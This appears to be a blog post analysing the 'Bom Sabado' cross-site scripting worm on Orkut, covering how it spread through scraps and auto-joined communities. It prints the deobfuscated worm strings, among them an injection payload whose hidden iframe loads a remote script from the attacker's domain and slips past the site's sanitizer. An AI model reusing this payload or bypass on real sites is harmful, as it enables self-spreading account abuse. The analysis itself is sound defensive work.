So, today morning I received an email saying I recieved an orkut scrap from a friend with contents “Bom Sabado”.
Within a minute, I received same scrap from another friend. Now getting the feel that this must be some sort of worm, I decided to open Orkut with firebug logging enabled to see what’s going on.
It turns out that its a typical case of Cross-Site Scripting (XSS), the attacked is able to include and execute its own script from hxxp://tptools.org/worm.js and the contents of scrap are able to by-pass orkut sanitization.
What it does
As soon as someone logs in and visits its scrap page,
- Same Scrap is automatically posted to all friends
- Automically joins a set of communities[infact, it seems visiting one of these communities is sufficient to get infected] with community IDs 106698808, 6, 558494, 106698628, 106691341
- Use ad-block to disable access to hxxp://tptools.org/worm.js
- Do not visit any of the aforementioned communities.
How it works(spreads)
The obfuscated script is available at the aforementioned URL, it is obfuscated and simplifying it gives the contents of the script as utilizing the following variable,
var _0x37a1 = [Microsoft.XMLHttp,POST_TOKEN=,CGI.POST_TOKEN,&signature=, Page.signature.raw,POST,Scrapbook?,open, Content-Type,application/x-www-form-urlencoded;, setRequestHeader,&scrapText=,<style/><iframe style=display:none onload=”a = document.createElement( ‘script’);a.src = ‘/’ + ‘/tptools.o’+’rg/worm.js’+’#<wbr>#’; document . body . appendChild( a )”></iframe>Bom Sabado!,&uid=,
&Action.submit=1,send,GET,RequestFriends?req=fl&uid=,uid,&oxh=1,while (true); &&&START&&&,,replace,responseText,CommunityJoin?cmm=,&Action.join=1, 106698808,6,558494,106698628,106691341,var friends = ,;,list,data,id]
- It seems that an ill-formed <style/> tag is able to escape Google’s sanitation mechanism resulting into parsing of scrap text as HTML [I might be wrong at this].
- The second emphasized section shows the community IDs to which this script autmoatically sends join request.